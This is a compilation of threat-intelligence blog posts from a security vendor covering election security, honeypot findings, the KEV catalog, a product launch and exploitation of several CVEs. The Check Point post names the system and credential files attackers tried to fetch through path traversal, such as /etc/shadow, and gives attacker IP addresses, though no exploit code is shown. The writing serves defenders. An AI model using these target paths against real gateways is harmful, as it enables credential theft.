.png)
GreyNoise’s honeypots have been actively monitoring exploit attempts targeting the SolarWinds Serv-U vulnerability (CVE-2024-28995), revealing exactly what files attackers are after. From key system files to credential-containing configuration files, our data shows how attackers are scanning for vulnerable systems in real time.
GreyNoise interacts directly with attackers through its honeypots, providing verifiable, firsthand data. This gives security teams a clearer, more accurate picture of real-time threats, allowing them to cut through the noise and focus on what's truly malicious.
(This is part three in our "Understanding the Election Cybersecurity Landscape" series.)
As we rapidly approach the 2024 U.S. elections, the human element remains one of the most vulnerable aspects of our electoral system. While technological defenses continue to evolve, state actors and cybercriminals in general are increasingly turning to phishing and social engineering tactics to exploit human psychology and gain unauthorized access to sensitive information or systems. These attacks pose a significant threat to election integrity by targeting election officials, campaign staff, and voters alike.
Phishing attacks during election seasons often exploit the heightened emotions and time pressures associated with political campaigns. Attackers craft convincing emails, text messages, or social media posts that appear to come from trusted sources such as election boards, political parties, or candidates themselves. These messages typically create a sense of urgency or importance to prompt quick, unthinking responses from targets.
For example, an election official might receive an email that appears to be from a voting machine vendor, claiming there's a critical security update that needs immediate attention. The email could contain a malicious link or attachment that, when clicked, installs malware or captures login credentials. Similarly, voters might receive text messages with false information about polling place changes or registration requirements, containing links to fraudulent websites designed to steal personal information.
Social engineering attacks go beyond simple phishing by leveraging more complex psychological manipulation. These attacks often involve multiple touchpoints and can unfold over extended periods, making them particularly insidious.
In the context of elections, a social engineering attack might involve an attacker posing as an IT support technician, contacting county election workers with offers of assistance. Over time, the attacker builds trust and may eventually request remote access to systems or sensitive information under the guise of providing support. This type of attack exploits the often-overworked and under-resourced nature of many local election offices.
Another common tactic is impersonating authority figures. An attacker might pose as a high-ranking election official or party leader, using this perceived authority to pressure lower-level staff into bypassing security protocols or divulging confidential information.
The consequences of successful phishing and social engineering attacks can be far-reaching. A single compromised account or system can serve as an entry point for broader network infiltration, potentially leading to:
Moreover, even unsuccessful attacks can erode public confidence in the electoral process. The mere perception that election systems or officials might be compromised can fuel doubts about election integrity, which could be especially problematic this year.
Mitigating the risks posed by phishing and social engineering requires a multi-faceted approach that combines technological solutions with robust human training and awareness programs.
As we move ever closer to the 2024 elections, the sophistication of phishing and social engineering attacks is likely to increase. The rise of AI-generated content, including deepfakes, will make it even more challenging to distinguish legitimate communications from fraudulent ones (something we will cover in the final installment).
However, by focusing on the human element – both in terms of vulnerabilities and strengths – we can build a more resilient election security ecosystem. Empowering election officials and voters with knowledge and critical thinking skills is our best defense against these evolving threats.
The integrity of our elections depends not just on secure technology, but on a vigilant and informed populace. By recognizing the central role of human factors in election security, we can work towards elections that are not only technologically sound but also trusted and resilient in the face of increasingly sophisticated attacks.
Censys and GreyNoise teamed up for the last three months to shed new light on the real-world threats facing internet-exposed industrial control systems (ICS). At LABSCon 2024, they shared their findings, challenging some long-held assumptions about ICS security.
Earlier this year, Censys researchers identified over 40,000 internet-connected ICS devices in the U.S., including over 400 human-machine interfaces (HMIs). Many of these interfaces required no authentication at the time of observation. HMIs provide easy-to-understand and easy-to-manipulate interfaces, which make them low-hanging targets for threat actors seeking to disrupt operations. Given the relative ease of manipulation, we were curious about the actual attack traffic such interfaces receive.
To conduct preliminary research, GreyNoise set up hyper-realistic emulations of internet-connected HMIs for critical control systems, camouflaging them by geography and ASNs. Glenn Thorpe, Sr. Director, Security Research & Detection Engineering at GreyNoise analyzed forty-five days of data for these surprising and concerning findings:
This research highlights a potential disconnect between perceived risks and actual threat actor behavior toward internet-exposed ICS. While the industry has long focused on securing ICS-specific communication protocols, the more pressing threat may lie in more common, easily exploitable entry points like remote access services. The swift targeting suggests a prioritization for probing such devices online.
This research underscores the critical importance of securing remote access services as a frontline defense for ICS environments. The relative ease of targeting these generic entry points may often render the exploitation of specialized ICS protocols unnecessary.
GreyNoise and Censys intend to continue this research to learn more based on these experimental findings.
GreyNoise Intelligence has been tracking a mysterious and increasingly concerning phenomenon since January 2020: massive waves of spoofed traffic, known as “Noise Storms.” These events have stumped cybersecurity experts and now pose new, complex risks, demanding attention from security professionals worldwide. These persistent mysteries add new layers of complexity to the cybersecurity landscape, prompting security leaders to reevaluate their defenses and ensure they are equipped with the right tools for an ironclad security posture.
We discussed this in detail in this week’s episode of Storm⚡Watch which you can view or listen to for a broader context.
Despite ongoing research, no definitive explanation for these mysterious storms has emerged. Experts debate they could represent covert communications, Distributed Denial of Service (DDoS) attacks, or misconfigurations, leaving critical questions unanswered.
Millions of spoofed IPs are flooding key internet providers like Cogent and Lumen while strategically avoiding AWS — suggesting a sophisticated, potentially organized actor with a clear agenda.
Although traffic appears to originate from Brazil, deeper connections to Chinese platforms like QQ, WeChat, and WePay raise the possibility of deliberate obfuscation, complicating efforts to trace the true source and purpose.
Advanced techniques such as TTL manipulation, OS emulation, and precise targeting make these Noise Storms not only difficult to detect but challenging to block.
These characteristics suggest a sophisticated actor with specific goals, but the ultimate purpose remains elusive.
Noise Storms typically manifest as millions of spoofed IP addresses generating highly unusual network activity, primarily focusing on TCP connections to port 443 (HTTPS) and ICMP packets — leaving cybersecurity experts perplexed.
Interestingly, we've observed almost no UDP traffic associated with these events, making detection tools fine-tuned for UDP-based attacks less effective.
Recent traffic suggests Brazil as the apparent origin of these spoofed packets, but we believe this is likely another layer of obfuscation, adding to the growing uncertainty about the true source.
In our ongoing monitoring, several intriguing characteristics have emerged:
These characteristics suggest a sophisticated actor with an agenda; however, the purpose of these activities remains unclear to experts.
A curious feature of recent Noise Storms is the inclusion of the ASCII string "LOVE" embedded within the ICMP packets, along with other varying bytes. This seemingly benign message only adds to the intrigue, leaving experts questioning whether these storms might serve as a covert communication channel
Our analysis has revealed that the Autonomous System Number (ASN) associated with the ICMP traffic is linked to a Content Delivery Network (CDN) servicing major Chinese platforms like QQ, WeChat, and WePay. This connection raises further concerns about deliberate obfuscation, suggesting that more sophisticated actors could be involved.
Despite years of observation and analysis, the true nature of Noise Storms remains elusive. Theories within the cybersecurity community include:
The persistence and evolution of Noise Storms over four years underscore the complexity of modern cyber threats. As these events continue to adapt and puzzle researchers, they serve as a reminder of the ever-changing landscape of internet security.
Noise Storms are a reminder that threats can manifest in unusual and bizarre ways, highlighting the need for adaptive strategies and tools that go beyond traditional security measures. Here are some key takeaways for security leaders:
GreyNoise Intelligence remains committed to investigating this phenomenon and will continue to share our findings with the cybersecurity community. We encourage network operators and security researchers to remain vigilant and report any similar observations to help unravel this ongoing internet mystery.
We’ve published packet captures (PCAPs) of the two recent storm events up in GitHub for the community to poke at. We’d love to know what you find! You can contact us at research@greynoise.io with any questions or discoveries.
(This is part two in our "Understanding the Election Cybersecurity Landscape" series.)
State-sponsored actors play a critical role in election interference, employing a range of tactics to undermine the integrity of the electoral process. These actors, often backed by powerful nations like Russia, China, and Iran, have the resources and motivation to conduct sophisticated attacks that can erode public trust in elections.
State-sponsored actors engage in various activities interfering with elections, including cyberespionage, disinformation campaigns, and direct attacks on election infrastructure. Cyberespionage involves the theft of sensitive information, such as voter data or campaign communications, which can be used to influence public opinion or blackmail candidates. Disinformation campaigns, often conducted through social media, aim to spread false or misleading information to manipulate voter perceptions and sow discord. For example, Russia has been known to use fake personas and highly networked accounts to spread hyper-partisan themes effectively and quickly.
Direct attacks on election infrastructure are also a concern, as they can disrupt the voting process and undermine the integrity of election results. This includes attempts to gain physical or digital access to election systems, which can compromise their confidentiality, availability, or integrity. For instance, the Justice Department recently indicted two Russian propagandists associated with the state-funded media outlet RT for allegedly engaging in money laundering and channeling nearly $10 million to a right-leaning media organization.
We've also seen evidence of a recent suspected Iranian attack against the campaign of Republican presidential nominee Donald Trump, potentially resulting in the theft of internal campaign documents. The FBI is investigating the matter, as well as attempts to infiltrate President Joe Biden's reelection campaign, which became Vice President Kamala Harris' campaign after Biden dropped out of the race.
The activities of state-sponsored actors in election interference have significant implications for democratic societies. By undermining public trust in the electoral process, these actors can erode the legitimacy of governments and create social divisions. For example, research suggests that election interference campaigns can intensify internal divisions within a target state, making it harder for the political establishment to agree on priorities, implement policy, and respond to challenges from foreign actors.
To counter the threats posed by state-sponsored actors, it is essential to understand their methods and recognize the signs of such interference. This includes investing in cybersecurity efforts for political campaigns, encouraging social media companies to remove deceptive or hateful posts, and passing legislation requiring online political ads to adhere to certain standards of truthfulness. Additionally, election officials should take steps to harden infrastructure against common attacks, utilize account security tools, and rehearse incident response plans.
Understanding the methods of state-sponsored actors and recognizing the signs of such interference is crucial in developing robust defenses. By investing in cybersecurity, promoting transparency in political advertising, and enhancing election infrastructure security, we can mitigate the risks posed by these actors and protect the integrity of democratic elections.
We've put together the following list of resources to help folks further understand and defend against this very real and present threat:
Recent Influence Operations: Recent foreign influence operations have been identified, including those perpetrated by Russia, China, and Iran, which have been accused of conducting complex campaigns to manipulate U.S. politics.
We're excited to share a groundbreaking new blog post from our Labs team that dives deep into the world of Bluetooth Low Energy (BTLE) device identification and vulnerability research. In "BLUUID: Firewallas, Diabetics, And... Bluetooth," our very own Remy explores the fascinating and often overlooked realm of BTLE security.
This comprehensive analysis covers everything from building a BTLE Generic Attribute (GATT) Universally Unique Identifiers (UUIDs) database to remotely identifying Bluetooth devices for vulnerability research. Remy doesn't just stop at theory – he demonstrates real-world implications by uncovering and responsibly disclosing vulnerabilities in Firewalla firewall products.
But why should you care about BTLE security? As Remy points out, the impact extends far beyond just privacy concerns. Recent incidents involving BTLE-enabled insulin pumps highlight the potential for physical harm when these systems are compromised or malfunction.
In this blog, you'll learn:
Whether you're a cybersecurity professional, IoT enthusiast, or simply curious about the hidden world of Bluetooth, this blog post offers valuable insights and practical techniques you won't want to miss.
Ready to dive in? Head over to the GreyNoise Labs blog to read the full article and expand your understanding of BTLE security and its far-reaching implications.
Last week at BSidesLV, I had the privilege to explore the complexities of the CISA's Known Exploited Vulnerabilities (KEV) Catalog. This vital resource aids organizations in understanding which vulnerabilities are actively exploited and how to prioritize remediation efforts effectively.
Here, I’ll share three key insights from my analysis that can enhance vulnerability management strategies.
The full talk (it's only 20 minutes, but I clearly could have used 30!) can be found here, and the slides and dataset used can be found here.
The average age of CVEs added to the KEV decreases over time. In 2023, which we consider the first full baseline year, most vulnerabilities were added within the first week of their assignment. This trend suggests not only are vulns being exploited faster (we know this) but also improved information sharing and partnerships between CISA and other organizations.
Additionally, the shift towards younger CVEs being added to KEV is encouraging as it indicates that the security community is becoming more proactive in identifying exploitation. For organizations, this means staying vigilant and ready to respond quickly to newly disclosed vulnerabilities, as they're more likely to be added to the KEV shortly after discovery.
A lesser-known aspect of the KEV data is that it's not static.
In October 2023, CISA added a field called "known ransomware campaign use" to the catalog. We found that this field is updated silently and can change from "unknown" to "known" without fanfare. From October 2023 → July 2024, this field was updated 41 times.
Research suggests that vulnerabilities flagged for known ransomware use are patched 2.5 times faster; this makes sense given the significant financial and operational impacts of ransomware attacks. Organizations should pay close attention to this field and regularly check for updates. It goes without saying that if a vulnerability in your environment is flagged for known ransomware use, it should be prioritized for patching immediately.
Another interesting finding is that by considering two data points from within the KEV, you can discern a “level of concern” that organizations can use to make more informed decisions about which vulnerabilities to address first when resources are limited.
1. The time that is given to fix the vulnerability.
Early on, the time to fix a vulnerability was either 14 or 180 days. Shortly after the Russia/Ukraine war, CISA seemed to adjust to a 21-day fixed period. However, if you look at the bottom right of the plot, you'll notice that there have been a handful of vulnerabilities with even shorter fix timelines in the last year.
2. The day of the week the vulnerability was added to the KEV.
Interestingly, the day of the week a vulnerability is added can be telling. In the past year+, there have only been two drops on a Friday, and both had a time to fix of 7 days (a time to fix of 7 days has only happened six more times). Overall, the time to fix has standardized to 21 days for most entries, but shorter timeframes indicate higher-priority vulnerabilities.
To summarize, although the KEV catalog is mainly intended for government use, it provides valuable insights for prioritizing vulnerabilities. Cybersecurity professionals can enhance their remediation efforts by analyzing patterns such as vendor dominance, time given to fix, the day of the week an issue was added, and any changes to the ransomware field.
Again, the full talk can be found here, and the slides and dataset can be found here.
All of my friends (and my bathroom scale, honestly) will tell you that I love tortillas. Not just any tortillas, however…they have to be homemade. I make sure we have homemade tortillas every week and keep them in the fridge. They are better than anything you can buy in a store, and they are simply amazing when they are hot off the comal. My kids know this; when they see the comal on the stove, they make a point of hanging around the kitchen to snag one (often a few!) while they are fresh because they understand that freshness is everything for tortillas.
In just the first 6 months of 2024, we’ve seen over 2,000 remotely exploitable, no-authentication-necessary CVEs be published. These are the kinds of vulnerabilities that are exploited on the Internet - via APTs and criminals or botnets driving mass exploitation - every minute of every day. This is a huge amount to deal with, and what we’ve seen this year is that they are occurring more frequently on edge devices that don’t have many mitigating controls to protect them. When these things happen, it forces security teams to drop what they are doing and scramble for a fix.
There are many existing vulnerability prioritization solutions that can help by including information like “Known Exploits Available” or “In the Wild”. The issue is that these attributes quickly become stale. Technically, a snippet of proof-of-concept code is an available exploit, but it isn’t the same as a mass exploitation attack by a criminal organization. A hard-to-exploit race condition that requires a lot of time and effort might be “In the Wild”, but that doesn’t require the same urgency to fix as something an actor is actively exploiting today. In many ways, these attributes (in addition to CVSS Base Scores, Vendor bulletins, etc) are like stale tortillas - edible but ultimately unsatisfying.
At GreyNoise we believe that security teams deserve actionable information that is fresh enough to know what attackers are doing right now, so that they can respond with the speed and urgency required. Consequently, today we’re launching GreyNoise for Vulnerability Prioritization to give our customers exactly that.
We run a global network of thousands of sensors that emulate the types of assets enterprises have exposed to the Internet: web servers, network gear, etc. We see when attackers and bots start probing them, and we collect the data as they are attacked in real-time. We compare this against known bad behaviors and known IPs; our ML models are even capable of alerting us to unknown but suspicious or malicious activities that are the hallmarks of novel exploits. This is all unique, primary data that we collect rather than simply aggregating from third-party sources. In other words, we make fresh tortillas from scratch rather than just reselling ones we bought from a supermarket.
As we collect this information, we make it immediately available via our Visualizer for ad-hoc usage and through our API for inclusion in your existing automation. We ensure that information is always fresh, so that you can get the most up-to-date intel for as long as you need until you fix the problem.
There are many good vulnerability prioritization tools out there, but we believe that only we can tell vulnerability teams which CVEs need attention now based on what attacks are actually happening today. Because Vuln Intel is based on all the same data that powers GreyNoise, you’ll also be able to share what you know seamlessly with your SOC analysts and threat hunters.
We think you’ll enjoy having fresh and actionable information with Greynoise Vulnerability Prioritization. You can visit our website to learn more or schedule time to talk with us directly.
I know you’ll also love having fresh and delicious tortillas, so please enjoy this recipe. I look forward to hearing from you about both!
Ingredients:
For example, I find 300gm (4 x 75gm) flour + 75gm lard (1 x 75gm) + 8gm salt (.1 x 75gm) mixed with 150gm (2 x 75gm) hot water makes 8 burrito-sized or 12 fajita-sized tortillas.
Instructions:
Eat them soon — they will be unbelievably good for 60 minutes, very good the rest of the day, and better than anything you can buy in the store for at least a week if you keep them in the fridge.
As we edge closer to the 2024 U.S. elections, the cybersecurity landscape surrounding this crucial event is more complex and dynamic than ever. The sheer variety of targets, tactics, and threats highlights the immense challenge of securing our democratic process. From state-sponsored entities to cybercriminals and hacktivists, a multitude of actors are ready to exploit any vulnerabilities they can find. Understanding this broad landscape is essential for grasping the challenges we face and appreciating the efforts required to safeguard our elections.
To help reduce any confusion, and provide some solid guidance, we’ve put together a multipart series that we’ll be releasing over the coming weeks. The goal is to help folks understand what’s truly at-risk, along with helpful things you can do to join in the efforts to maintain and increase the cyber safety and resilience of America’s elections. We’re starting, today, with an overview of who and what is truly at risk, along with a high-level review of the adversaries and tactics in play. Over the remaining series, we’ll tackle:
Let’s dive in!
When we think about election security, our minds often jump to voting machines and voter registries. While these are certainly critical, the attack surface extends far beyond them. Political campaigns, for instance, rely heavily on digital infrastructure, including websites, email systems, and databases. These elements are prime targets for cyber intrusions and disinformation campaigns designed to disrupt operations and erode public trust. Political parties, too, are vulnerable, with adversaries seeking to steal sensitive information or create chaos within their ranks.
News and social media platforms also play a crucial role in the election process. Unfortunately, they are frequently exploited to spread disinformation and sow discord among voters. Manipulating these platforms can have far-reaching consequences, influencing public opinion and undermining the democratic process. Election management systems, responsible for counting, auditing, and reporting results, are also critical targets. Ensuring the integrity of these systems is paramount to maintaining the credibility of the electoral outcome.
The tactics employed by threat actors are as diverse as the targets they pursue. Traditional cyber intrusions, such as phishing and spear phishing, remain prevalent, allowing adversaries to gain unauthorized access to sensitive systems and data. Distributed denial of service (DDoS) attacks aim to disrupt the availability of critical election-related websites and services, potentially causing widespread confusion and delays. Ransomware, which involves encrypting critical data and demanding payment for its release, poses a significant threat to election infrastructure, with the potential to cripple essential operations.
While most voting machines are not directly connected to the internet, they are still vulnerable to internet-based attacks through indirect means. For example, voting machines must accept electronic input files from other computers, such as ballot definition files prepared on Election Management System (EMS) computers. If these EMS computers are compromised, they can introduce fraudulent data or malicious code into the voting machines. This indirect connection to the internet creates a potential attack vector that sophisticated adversaries could exploit.
Recently, the rise of deepfakes and disinformation has added a new layer of complexity to the cybersecurity landscape. The use of AI-generated content to mislead voters and manipulate public opinion has become increasingly sophisticated, making it harder to discern truth from falsehood. These tactics are not only disruptive, but also corrosive, eroding trust in the electoral process and the institutions that support it.
The actors behind these threats are varied, each with distinct motivations and capabilities. State-sponsored actors, including nations such as Russia, China, Iran, and North Korea, have been identified as significant threats. These entities aim to undermine U.S. elections to destabilize the country and influence its policies. Their sophisticated operations often involve a combination of cyber intrusions, disinformation campaigns, and other tactics designed to achieve strategic objectives.
Cybercriminals, on the other hand, are typically motivated by financial gain. They may deploy ransomware or sell stolen data on the “dark web”, exploiting vulnerabilities for profit. Hacktivists, driven by ideological beliefs, seek to promote their political agendas by disrupting election processes or exposing perceived injustices. While their methods may differ, the impact of their actions can be equally damaging.
Understanding the broad landscape of election cybersecurity threats plays a significant role in helping us grasp the complexity and scope of the challenges faced. This knowledge helps the public appreciate the efforts required to secure elections and underscores the importance of vigilance and proactive measures.
As we approach the 2024 elections, enhanced security measures, such as implementing multifactor authentication and conducting regular vulnerability assessments, are vital. Public awareness and education about common disinformation tactics can help mitigate the impact of false information. At the same time, collaboration and information sharing between federal, state, and local agencies, as well as private sector partners, are essential for a coordinated response to emerging threats.
By comprehending and addressing the diverse array of threats, tactics, and actors in the election cybersecurity landscape, we can better protect the integrity of our democratic processes and ensure that every vote counts.
Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.
The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risks. Multiple XML files can be invoked using the vulnerability.
Click here to see the details and interesting payload that Sift has identified.
.png)
On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.
They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.
They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).
Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.
Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability exploits a 'best-fit' Unicode processing behavior in Windows. This allows attackers to inject command-line arguments via HTTP requests.
.png)
Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.
Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.
.png)
On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."
Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:
Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).
On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.
On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.
The core vulnerability is a pretty straight-forward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):
Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.
Although we tagged this issue very quickly, we actually saw the first exploit attempt (attempt), with a non-working exploit, hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:
We started seeing actual exploitation attempts logged in Sift on May 31, 2024:
I’m always impressed when an automated system can catch a novel exploit without being told about it!
We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:
The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?
In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.
The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for CISCO ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):
Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.
That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:
It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):
As you can see, /etc/fstab remains a popular target - probably it’s a reliable path being used by some off-the-shelf scanner(s).
/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull
/sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!
Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)
With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!
The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.
On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion, let’s dig into their answers below:
Q: What do you think is currently the biggest lie about AI?
A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.
Q: What AI advancement in the past few years are you most excited about?
A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.
Q: What's the most surprising thing an AI you've used has surfaced?
A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.
One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).
What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!
Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!
---
If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.
GreyNoise was founded to see what others don’t. That quest led us to build a unique global network of thousands of sensors across hundreds of strategically selected points of presence, giving cybersecurity practitioners unparalleled insight into online activity, whether malicious or benign.
And in 2023, we saw something new.
In the second quarter of 2023 GreyNoise researchers observed a substantial change in internet scanning behavior. Malicious inventory scans significantly reduced in frequency and scale, and the vast majority of these types of scans now come from benign sources. This, along with the speed at which compromises follow vulnerability announcements, strongly suggests more capable attacker groups have implemented their own form of “attack surface monitoring”, to avoid tripping existing defenses. Attackers are now less likely to risk their reconnaissance infrastructure being detected and flagged prior to establishing confidence in a successful attack path.
A change in attacker behavior is rendering current defenses less effective. But an established technique is ready to rise to the challenge. Honeypots are back.
With attackers routing around observation and detection, traditional third-party threat intelligence cannot provide the targeted attack visibility that defenders need. A first-party, honeypot-based approach is ready to step into the breach.
While honeypot programs have traditionally struggled with deployment, operation, and data analysis, new technology is changing the game. Advances in infrastructure automation, network traffic shaping, cloud computing, and artificial intelligence make it possible to consistently identify novel attacks and reveal attacker infrastructure. New honeypot networks are easy to deploy, with flexible impersonation, believable personas, and automated analysis. Whether on an organization’s perimeter or deployed across the globe, they provide the insights defenders need to protect key systems before a breach.
At GreyNoise, we haven’t just focused on tech leadership — we’ve brought in thought leadership as well. In order to educate the market about these new challenges, and how honeypots can help tackle them, our deception and intelligence experts Andrew Morris and Bob Rudis have published the Honeypots Are Back report. This report:
To dive deeper into each of these topics, read the report here. To see a demonstration of the new honeypot capabilities under development at GreyNoise today, watch our on-demand honeypot webinar here. And if you’re ready to discuss standing up a mature honeypot network in your own environment, talk to our team.
We had a blast at NetNoiseCon on April 19th and we hope you did too! If you missed out, don't worry - we've got you covered with this recap.
From incredible technical talks to insightful career advice from industry leaders, there was something for everyone. We strongly encourage you to watch each of the talks and soak in the wisdom shared by our stellar lineup of speakers.
Watch the full playlist of NetNoiseCon videos on YouTube here.
Special Storm⚡️Watch briefing from boB Rudis - GreyNoise’s boB Rudis shares a fun and insightful brief on several active APT groups and the targeting of industrial control systems.
Trashing the Pandas: Analyzing Current Infrastructure Trends and T9000v2 - A Mustang Panda Case Study - This incredible technical talk from floofpwn was a crowd pleaser. Join floofpwn as he analyzes Mustang Panda malware and explores current infrastructure trends. Threat Hunters & Researchers should dig this talk!
Methods of Finding Threat Signals - Proofpoint’s Greg Lesnewich presented his methods for finding signal within the noise, finding anomalies in the data, and how to use layering techniques to find threats.
Vintage Internet Noise - GreyNoise’s Kimber Duke dives into the vintage internet vulnerabilities, many of which are 20+ years old, that still haunt us today.
Out of Touch, Out of Timeline - Making Sense of Temporal Correlation - Jonathan Reiter from Dragos shares his method of time series analysis, leveraging tools like GreyNoise’s timeline of observed activity, to investigate scan and host behavior.
Brain skills | functions | AI - Santiago Holley, VP of Threat Management at Redtrace Technologies, shares his thoughts on the strengths of AI and the inherent strengths of humans and how our brains work - and how we can bring those two together.
Stress, Mindfulness, & Mental Health in Cybersecurity - Matt Johansen, writer of the Vulnerable U Newsletter, explores the particular challenges and stresses that many in cybersecurity face, and how to deal with them. This is a fantastic honest look at our work in InfoSec and the struggles that many have with mental health.
How I Got Into CyberSecurity - GreyNoise Ambassador Joseph McDonagh shares his unorthodox career path from the military into cybersecurity. At the end, Joseph also shares how he uses GreyNoise “backwards” and leverages Splunk.
---
Huge thanks to all of our speakers - we really appreciate their time and insight.Also - Thank you to everyone who tuned in and joined us live at NetNoiseCon, we had a blast!
We will bring NetNoiseCon back later this year, so stay tuned for more news about the next event. In the mean time, join us on Discord and say Hi!
The 2024 edition of the Verizon Data Breach Investigations Report (DBIR) has finally been released! The team did their usual bang-up job pulling key knowledge threads from the massive volume of data submitted by their ever-increasing number of contributors (of which GreyNoise is one!). Our researchers have pored over this tome to identify critical themes that should be of great import to GreyNoise customers and community.
Identifying when attackers attempt to exploit vulnerabilities on internet-facing endpoints is at the heart of what we do at GreyNoise. So, it comes as no surprise that the DBIR team “witnessed a substantial growth of attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach when compared to previous years.” The 180% increase was felt — almost daily — by all who keep track of headlines in the cybersecurity press. Our GreyNoise sensor fleet caught an extra 200K unique IPv4 addresses slinging malicious tagged activity our way (4.2 million malicious IPv4s in 2022 vs. 4.4 million in 2023), and the volume from those adversarial sources went from just over 10 million malicious tagged events to 13+ million.
One thing we did not expect was vulnerability exploitation chipping away at the volume of both credential-based attacks and phishing as the critical path action to initiate a breach, as seen in Figure 6 from the report:
